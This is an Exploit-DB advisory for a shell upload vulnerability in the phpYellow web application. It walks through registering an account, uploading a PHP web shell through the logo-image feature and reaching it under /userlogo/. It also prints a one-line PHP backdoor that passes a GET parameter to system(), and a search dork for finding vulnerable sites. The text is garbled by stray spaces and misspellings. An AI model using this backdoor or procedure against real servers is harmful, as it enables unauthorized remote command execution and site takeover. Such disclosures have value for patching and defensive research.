# Title: phpYellow Shell Upload Vulnerability
# EDB-ID: 10853
# CVE-ID :()
# OSVDB-ID :()
# Author: indoushka
# Published: 2009-12-31
# Verified: no
# Download Exploit Code
# Download N/
View sourceprint? ========================================================== ======================================
| # Title: phpYellow Shell Upload Vulnerability
| # Author: indoushka
| # Email: indoushka@hotmail.com
| # Home: Souk Naamane-04325-Oum El Bouaghi-Algeria-(00213771818860)
| # Total alerts found: 1
| High: 1
| Medium:
| Low:
| Informational:
| # Web Site: www.iq-ty.com
| # Published:
| # Dork: Powered by phpYellow All content Copyright©2009
| # Tested on: windows SP2 franzais V. (Pnx2 2.0) + Lunix franzais v. (9.4 Ubuntu)
| # Bug: Shell Upload
================================== Exploit By indoushka ====================== ============================
# Exploit:
1-Shell Upload (High)
Http: // server/sm-py526/register. php (Rigester into website)
Http://server/sm-py526/loginResult. php
Client Control Panel
Dz-ghost Customer ID #10
Images-new
Maximum filesize = 30 kb
Maximum width = 150 pixels
Maximum height = 150 pixels
Use a simpl backdoor
Example:
<? Php
$ Cmd = $ _ GET [cmd];
System ($ cmd );
?>
If you have a smal shell use it
Sav as yourname. php and upload hem
You find hem in http: // server/sm-py526/userlogo/backdoor. php?
================================== Dz-Ghost Team ==== ==========================================
Greetz: Exploit-db Team (loneferret + Exploits + dookie2000ca)
All my friend * Dos-Dz * snkespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion. ir) * Silitoad * redda * mourad (dgsn. dz) * www.cyber-mirror.org
A www.albasrah-forums.com * www. am